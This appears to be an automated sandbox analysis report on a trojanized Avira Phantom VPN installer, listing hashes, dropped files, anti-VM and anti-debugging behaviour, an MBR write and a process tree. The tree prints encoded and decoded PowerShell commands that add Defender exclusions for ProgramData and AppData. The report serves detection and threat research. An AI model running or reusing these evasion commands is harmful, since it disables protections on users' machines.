Analysis
- max time kernel: 146s
- max time network: 34s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 06-04-2023 12:26
Static task: static1
Behavioral task: behavioral1
- Sample: AviraPhantomVPN.7z
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: AviraPhantomVPN.7z
- Resource: win10v2004-20230220-en
General
- Target: AviraPhantomVPN.7z
- Size: 28.6MB
- MD5: edcaee17a820898e1ef4c3f1410d322d
- SHA1: 304a5c511e352ef0115d70b0dccb0f4802393b34
- SHA256: 645ff80fc1abf8919597a792ff5e26fb206f5ad0b5c08bf8a4a365585ca4ece0
- SHA512: ce8637d4109997b01a43b4df6d6b0c78902533f56b750fb877044884e14497699239d8bd1ae17aee77bda9e5d4f3cfca4a080dc4b03294c109435fbcf302d2af
- SSDEEP: 786432:e6jVlMlC4wWESx547yBEQJXkE5Qa1z8eXY+o:bJ4Jn/x5JKQ9dxXY+o
Malware Config
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM): 2 TTPs, 2 IoCs
Processes: VCR-2005-2023-09.02.2023.exe (two instances)
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (VCR-2005-2023-09.02.2023.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (VCR-2005-2023-09.02.2023.exe)

Checks BIOS information in registry: 2 TTPs, 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: VCR-2005-2023-09.02.2023.exe (two instances)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (VCR-2005-2023-09.02.2023.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (VCR-2005-2023-09.02.2023.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (VCR-2005-2023-09.02.2023.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (VCR-2005-2023-09.02.2023.exe)

Executes dropped EXE: 6 IoCs
Processes (PID, process):
- 596 AviraPhantomVPN.exe
- 1596 AviraPhantomVPN.tmp
- 1048 Avira Phantom VPN 2.41.1.25731.exe
- 300 VCR-2005-2023-09.02.2023.exe
- 1572 Avira Phantom VPN 2.41.1.25731.tmp
- 1332 VCR-2005-2023-09.02.2023.exe

Loads dropped DLL: 13 IoCs
Processes (PID, process, number of loads):
- 596 AviraPhantomVPN.exe (1)
- 1596 AviraPhantomVPN.tmp (5)
- 1048 Avira Phantom VPN 2.41.1.25731.exe (1)
- 1572 Avira Phantom VPN 2.41.1.25731.tmp (4)
- 300 VCR-2005-2023-09.02.2023.exe (1)
- 1332 VCR-2005-2023-09.02.2023.exe (1)

Checks installed software on the system: 1 TTP
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled: 2 IoCs
Processes: VCR-2005-2023-09.02.2023.exe (two instances)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (VCR-2005-2023-09.02.2023.exe)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (VCR-2005-2023-09.02.2023.exe)

Writes to the Master Boot Record (MBR): 1 TTP, 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes: VCR-2005-2023-09.02.2023.exe (two instances)
- File opened for modification: \??\PhysicalDrive0 (VCR-2005-2023-09.02.2023.exe)
- File opened for modification: \??\PhysicalDrive0 (VCR-2005-2023-09.02.2023.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger: 2 IoCs
Processes (PID, process):
- 300 VCR-2005-2023-09.02.2023.exe
- 1332 VCR-2005-2023-09.02.2023.exe

Drops file in Program Files directory: 6 IoCs
Processes: AviraPhantomVPN.tmp
- File opened for modification: C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe
- File created: C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat
- File created: C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-CEU7S.tmp
- File created: C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-SDPLS.tmp
- File created: C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.msg
- File opened for modification: C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat

Enumerates physical storage devices: 1 TTP
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies registry class: 64 IoCs
Processes: rundll32.exe
Runs net.exe

Suspicious behavior: EnumeratesProcesses: 23 IoCs
Processes (PID, process, number of hits):
- 1596 AviraPhantomVPN.tmp (2)
- 1488 powershell.exe (1)
- 1420 powershell.exe (1)
- 1396 7zFM.exe (1)
- 1572 Avira Phantom VPN 2.41.1.25731.tmp (18)

Suspicious use of AdjustPrivilegeToken: 5 IoCs
Processes (description, PID, process):
- Token: SeRestorePrivilege, 1396 7zFM.exe
- Token: 35, 1396 7zFM.exe
- Token: SeSecurityPrivilege, 1396 7zFM.exe
- Token: SeDebugPrivilege, 1488 powershell.exe
- Token: SeDebugPrivilege, 1420 powershell.exe

Suspicious use of FindShellTrayWindow: 3 IoCs
Processes (PID, process, number of hits):
- 1396 7zFM.exe (2)
- 1596 AviraPhantomVPN.tmp (1)

Suspicious use of SetWindowsHookEx: 4 IoCs
Processes (PID, process, number of hits):
- 1124 rundll32.exe (1)
- 1572 Avira Phantom VPN 2.41.1.25731.tmp (3)

Suspicious use of WriteProcessMemory: 61 IoCs
Processes (source PID and process, target PID and process, number of writes):
- 1704 cmd.exe wrote to memory of 1124 rundll32.exe (3)
- 1124 rundll32.exe wrote to memory of 1396 7zFM.exe (3)
- 1396 7zFM.exe wrote to memory of 596 AviraPhantomVPN.exe (7)
- 596 AviraPhantomVPN.exe wrote to memory of 1596 AviraPhantomVPN.tmp (7)
- 1596 AviraPhantomVPN.tmp wrote to memory of 296 cmd.exe (4)
- 296 cmd.exe wrote to memory of 1488 powershell.exe (4)
- 296 cmd.exe wrote to memory of 1420 powershell.exe (4)
- 1596 AviraPhantomVPN.tmp wrote to memory of 1048 Avira Phantom VPN 2.41.1.25731.exe (7)
- 1596 AviraPhantomVPN.tmp wrote to memory of 300 VCR-2005-2023-09.02.2023.exe (4)
- 1048 Avira Phantom VPN 2.41.1.25731.exe wrote to memory of 1572 Avira Phantom VPN 2.41.1.25731.tmp (7)
- 1572 Avira Phantom VPN 2.41.1.25731.tmp wrote to memory of 844 net.exe (4)
- 844 net.exe wrote to memory of 1664 net1.exe (4)
- 300 VCR-2005-2023-09.02.2023.exe wrote to memory of 1332 VCR-2005-2023-09.02.2023.exe (3)
Processes
The tree below is indented by depth; the number in brackets is the depth recorded by the sandbox.

[1] C:\Windows\system32\cmd.exe (PID 1704)
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\rundll32.exe (PID 1124)
      Command line: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z
      - Modifies registry class
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    [3] C:\Program Files\7-Zip\7zFM.exe (PID 1396)
        Command line: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AviraPhantomVPN.7z"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe (PID 596)
          Command line: "C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory

        [5] C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp (PID 1596)
            Command line: "C:\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmp" /SL5="$500EE,28849760,1046016,C:\Users\Admin\AppData\Local\Temp\7zO4751804C\AviraPhantomVPN.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\SysWOW64\cmd.exe (PID 296)
              Command line: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\WebrootCommAgentService.bat""
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1488)
                Command line: powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAnACkA
                Decoded (-ENC is base64 of UTF-16LE): Add-MpPreference -ExclusionPath ('C:\ProgramData\')
                This adds a Microsoft Defender exclusion for C:\ProgramData\.
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1420)
                Command line: powershell -ENC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAXABBAHAAcABEAGEAdABhACcAKQA=
                Decoded (-ENC is base64 of UTF-16LE): Add-MpPreference -ExclusionPath ([System.Environment]::GetEnvironmentVariable('USERPROFILE') + '\AppData')
                This adds a Microsoft Defender exclusion for the current user's AppData directory.
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

          [6] C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe (PID 1048)
              Command line: "C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious use of WriteProcessMemory

            [7] C:\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmp (PID 1572)
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmp" /SL5="$201EC,7215309,64512,C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exe" /install /quiet /norestart
                - Executes dropped EXE
                - Loads dropped DLL
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of SetWindowsHookEx
                - Suspicious use of WriteProcessMemory

              [8] C:\Windows\SysWOW64\net.exe (PID 844)
                  Command line: "net" stop "AviraPhantomVPN"
                  - Suspicious use of WriteProcessMemory

                [9] C:\Windows\SysWOW64\net1.exe (PID 1664)
                    Command line: C:\Windows\system32\net1 stop "AviraPhantomVPN"

          [6] C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe (PID 300)
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\\VCR-2005-2023-09.02.2023.exe"
              - Identifies VirtualBox via ACPI registry values (likely anti-VM)
              - Checks BIOS information in registry
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks whether UAC is enabled
              - Writes to the Master Boot Record (MBR)
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              - Suspicious use of WriteProcessMemory

            [7] C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exe (PID 1332)
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\\VCR-2005-2023-09.02.2023.exe"
                - Identifies VirtualBox via ACPI registry values (likely anti-VM)
                - Checks BIOS information in registry
                - Executes dropped EXE
                - Loads dropped DLL
                - Checks whether UAC is enabled
                - Writes to the Master Boot Record (MBR)
                - Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD50551a45b547df5e6b866f57ecab217fe
SHA1fe06984bcd4da4d7d0ad527350668a0a4237b2d5
SHA256089337dcdffcf9e49e10ef1efd380bf8d9d0731d537e9eeda8e9434ad0021d36
SHA512b49c0d00f11387bff5cf9eb4f1935fc194bf922e8fb0519b35475b690cd546e544ffe9875b7370eee61f30e9fdb71cd71de42ec901b7a59628123c514d83a206
-
\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Avira Phantom VPN 2.41.1.25731.exeFilesize
7.2MB
MD5bf245b7db7637e6b2991105f62cc76de
SHA11d7252929d5c4cb404a34e553b72757729c701d5
SHA256c414e764c53a81c6beb2c393635044661da238380492c182162b37f3e82a8c89
SHA51208380e7ab2012f453ec4cb72646ca3a920d32f2f253f5c956b239780d1d08e434c4353580f6f9c95317b0e76810bc9351def59039350b96a4d989ece80722076
-
\Users\Admin\AppData\Local\Temp\_MEI3002\python39.dllFilesize
4.3MB
MD57e9d14aa762a46bb5ebac14fbaeaa238
SHA1a5d90a7df9b90bdd8a84d7dc5066e4ea64ceb3d9
SHA256e456ef44b261f895a01efb52d26c7a0c7d7d465b647a7b5592708ebf693f12a3
SHA512280f16348df1c0953bbc6f37ff277485351171d0545ebe469bacd106d907917f87584154aec0f193f37322bc93ac5433cd9a5b5c7f47367176e5a8b19bbd5023
-
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\ISTask.dllFilesize
66KB
MD586a1311d51c00b278cb7f27796ea442e
SHA1ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec
-
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\VclStylesInno.dllFilesize
3.0MB
MD5b0ca93ceb050a2feff0b19e65072bbb5
SHA17ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA2560e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA51237242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2
-
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\_isetup\_shfoldr.dllFilesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
\Users\Admin\AppData\Local\Temp\is-8HN4I.tmp\_isetup\_shfoldr.dllFilesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exeFilesize
203.8MB
MD515e605889d7f61f878efa3c1d9d728f1
SHA197f89ac691e046425e6f713f87bf7cc3e232fa90
SHA256ed9416c9cb0d3362e1339362ad5d7a6495be9d0946d79b089728c53ec0d96cee
SHA51203089c324e91d6838b886695e6c3760929a9f02d87fd5b2ff2334f975f5d38884537eeb48dedf8d5a3ba10319a1192e61b861ab7f38f262cbf0359786c13a598
-
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\VCR-2005-2023-09.02.2023.exeFilesize
60.0MB
MD57ff90e94bc9c2798eb29f620dbbb5e96
SHA11d31cba5ec2723daa93b9fda3b90ddc6ce72599b
SHA256ac50afe66c2ef410cbaef2dd34c2bf9c5ebe754d820cc04ca575ad657cf36e61
SHA5127f78547c85fb57bb67ba8a65b8193c1e9d017773478707a7e7fc6865c8eb9a8284822c069c896b937114a42bf484901202afd142643218e5951fb017e7390a08
-
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\_isetup\_isdecmp.dllFilesize
28KB
MD5077cb4461a2767383b317eb0c50f5f13
SHA1584e64f1d162398b7f377ce55a6b5740379c4282
SHA2568287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64
SHA512b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547
-
\Users\Admin\AppData\Local\Temp\is-G5PKH.tmp\innocallback.dllFilesize
63KB
MD51c55ae5ef9980e3b1028447da6105c75
SHA1f85218e10e6aa23b2f5a3ed512895b437e41b45c
SHA2566afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f
SHA5121ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b
-
\Users\Admin\AppData\Local\Temp\is-L86K5.tmp\AviraPhantomVPN.tmpFilesize
3.2MB
MD5709f58ff64c336a777ab15d80e18202c
SHA17c0e403482cf019e04d3ef5dcda3ef0e45d4c7c3
SHA256a5ee7f4c0ccbba0f695fee64edee7bacf5f59d7f1bf72d54621394e44a633003
SHA51259af9bd796bf9b42ef651483255a60a15b0557162d714c87337e7be2b631f00fc2ee32cd2b367133492c390f26ba8cef2a57245436f3bc63c03a5408a91368b5
-
\Users\Admin\AppData\Local\Temp\is-V4HI1.tmp\Avira Phantom VPN 2.41.1.25731.tmpFilesize
911KB
MD502c5691af81933ce36735946e3ed1ea4
SHA12faed8d51a0800f127e424bfba9d44bab6aee1b2
SHA256e1f5e87796c015e567153db6b994a35a34b0819b1093d1ea12064ee35102c42d
SHA512ebde4772c94f5199a2936f8fdbcf80e57d11a820276b1e1323fbcde6d192cd89bcc69a441cff17e26d688427fe05e62cc858e896c0647d93c9e2ebe74a6e6749
-
memory/300-311-0x00000000023A0000-0x00000000038CE000-memory.dmpFilesize
21.2MB
-
memory/300-175-0x000000013F1F0000-0x000000014071E000-memory.dmpFilesize
21.2MB
-
memory/300-229-0x000000013F1F0000-0x000000014071E000-memory.dmpFilesize
21.2MB
-
memory/300-260-0x000000013F1F0000-0x000000014071E000-memory.dmpFilesize
21.2MB
-
memory/300-332-0x00000000023A0000-0x00000000038CE000-memory.dmpFilesize
21.2MB
-
memory/596-184-0x0000000000400000-0x000000000050D000-memory.dmpFilesize
1.1MB
-
memory/596-100-0x0000000000400000-0x000000000050D000-memory.dmpFilesize
1.1MB
-
memory/596-91-0x0000000000400000-0x000000000050D000-memory.dmpFilesize
1.1MB
-
memory/1048-152-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/1048-227-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/1124-78-0x0000000003750000-0x0000000003760000-memory.dmpFilesize
64KB
-
memory/1124-79-0x0000000003740000-0x0000000003741000-memory.dmpFilesize
4KB
-
memory/1332-312-0x000000013F1F0000-0x000000014071E000-memory.dmpFilesize
21.2MB
-
memory/1332-333-0x000000013F1F0000-0x000000014071E000-memory.dmpFilesize
21.2MB
-
memory/1488-139-0x0000000002620000-0x0000000002660000-memory.dmpFilesize
256KB
-
memory/1488-140-0x0000000002620000-0x0000000002660000-memory.dmpFilesize
256KB
-
memory/1572-196-0x00000000008D0000-0x00000000008D1000-memory.dmpFilesize
4KB
-
memory/1572-217-0x0000000002130000-0x0000000002131000-memory.dmpFilesize
4KB
-
memory/1572-194-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-197-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-198-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-199-0x0000000002090000-0x0000000002091000-memory.dmpFilesize
4KB
-
memory/1572-200-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-201-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-203-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-204-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-202-0x00000000020E0000-0x00000000020E1000-memory.dmpFilesize
4KB
-
memory/1572-206-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-205-0x00000000020F0000-0x00000000020F1000-memory.dmpFilesize
4KB
-
memory/1572-207-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-208-0x0000000002100000-0x0000000002101000-memory.dmpFilesize
4KB
-
memory/1572-210-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-209-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-213-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-215-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-214-0x0000000002120000-0x0000000002121000-memory.dmpFilesize
4KB
-
memory/1572-216-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-218-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-219-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-220-0x0000000002140000-0x0000000002141000-memory.dmpFilesize
4KB
-
memory/1572-221-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-195-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-223-0x0000000002150000-0x0000000002151000-memory.dmpFilesize
4KB
-
memory/1572-222-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-224-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-212-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-225-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-211-0x0000000002110000-0x0000000002111000-memory.dmpFilesize
4KB
-
memory/1572-193-0x00000000008C0000-0x00000000008C1000-memory.dmpFilesize
4KB
-
memory/1572-228-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-230-0x0000000007220000-0x0000000007360000-memory.dmpFilesize
1.2MB
-
memory/1572-231-0x0000000002170000-0x0000000002171000-memory.dmpFilesize
4KB
-
memory/1572-191-0x0000000006F00000-0x000000000721A000-memory.dmpFilesize
3.1MB
-
memory/1572-226-0x0000000002160000-0x0000000002161000-memory.dmpFilesize
4KB
-
memory/1572-187-0x0000000000880000-0x0000000000896000-memory.dmpFilesize
88KB
-
memory/1572-268-0x00000000008A0000-0x00000000008A1000-memory.dmpFilesize
4KB
-
memory/1572-272-0x0000000000320000-0x0000000000321000-memory.dmpFilesize
4KB
-
memory/1572-185-0x0000000000320000-0x0000000000321000-memory.dmpFilesize
4KB
-
memory/1596-182-0x0000000000400000-0x0000000000747000-memory.dmpFilesize
3.3MB
-
memory/1596-176-0x0000000000400000-0x0000000000747000-memory.dmpFilesize
3.3MB
-
memory/1596-164-0x0000000003960000-0x0000000004E8E000-memory.dmpFilesize
21.2MB
-
memory/1596-130-0x0000000003440000-0x0000000003455000-memory.dmpFilesize
84KB
-
memory/1596-129-0x0000000000400000-0x0000000000747000-memory.dmpFilesize
3.3MB
-
memory/1596-121-0x0000000003440000-0x0000000003455000-memory.dmpFilesize
84KB
-
memory/1596-105-0x00000000001D0000-0x00000000001D1000-memory.dmpFilesize
4KB
-
memory/1596-101-0x0000000000400000-0x0000000000747000-memory.dmpFilesize
3.3MB
-
memory/1596-99-0x00000000001D0000-0x00000000001D1000-memory.dmpFilesize
4KB